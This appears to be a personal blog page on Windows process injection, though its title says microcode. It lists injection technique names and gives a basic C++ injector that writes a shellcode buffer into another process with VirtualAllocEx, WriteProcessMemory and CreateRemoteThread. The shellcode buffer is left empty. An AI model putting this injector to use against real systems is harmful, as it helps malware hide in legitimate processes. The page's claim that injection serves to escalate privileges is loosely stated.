<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <link rel="stylesheet" type="text/css" href="../style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Ernest Ivanov CV">
    <link href="svg/favicon.ico" rel="icon" type="image/x-icon" />
    <meta name="keywords" content="Ernest Ivanov CV, Ernest CV, Ivanov CV">
    <title>Ernest Ivanov | $BLOG | WHAT IS MICROCODE</title>
  </head>
  <body>
    <div class="article">
      <div class="myblog">
        <h1>MyBlog</h1>
        <hr>
        <div class="blog-links">
            <div class="blog-links-box">
                <h2>What is Process Injection</h2>
                <p>Process Injection is a way to inject your code on a running process and run along injected process to escalate users privileges.</p>
            </div>
            <div class="blog-links-box">
                <h2>Few Process Injection Techniques</h2>
                <ul><li>Classical DLL injection</li><li>Process hollowing</li><li>Atom bombing</li><li>Process doppelganging</li><li>APC injection</li><li>Early Bird Injection</li></ul>
            </div>
            <div class="blog-links-box">
                <h2>Basic Process Injection Program</h2>
                <textarea id="w3review" name="w3review" rows="21" cols="100">
#include &lt;iostream&gt;
#include &lt;windows.h&gt;

int main(){

    char shellcode[] = {
        // shellcode
    };

    HANDLE hProcess; // handle to store the remote process's handle
    HANDLE hThread;
    void* exec_mem;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, 17376); // PID ID [LAST]
    exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, 0);
    CloseHandle(hProcess);

    return 0;
}</textarea>
                <p>It should be noted that this program is made only for educational purposes.</p>
            </div>
            <h2>Source to read</h2>
            <p><a href="https://www.youtube.com/watch?v=tBR1-1J5Jec" target="_blank">What is Process Injection</a></p>
            <p><a href="https://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html" target="_blank">Process Injection Info Graphic</a></p>
            <a href="../blog.html">$BLOG</a>
        </div>
      </div>
      <div class="sidebar-ico">
        <div id="codeberg">
          <a href="https://codeberg.org/ivanov364" target="_blank"><img src="../img/Codeberg logo.svg" alt="codeberg img"></a>
        </div>
        <div id="protonmail">
          <a href="mailto:ivanov364@proton.me"><img src="../img/6953970.jpg" alt="protonmail img"></a>
      </div>
    </div>
  </body>
</html>
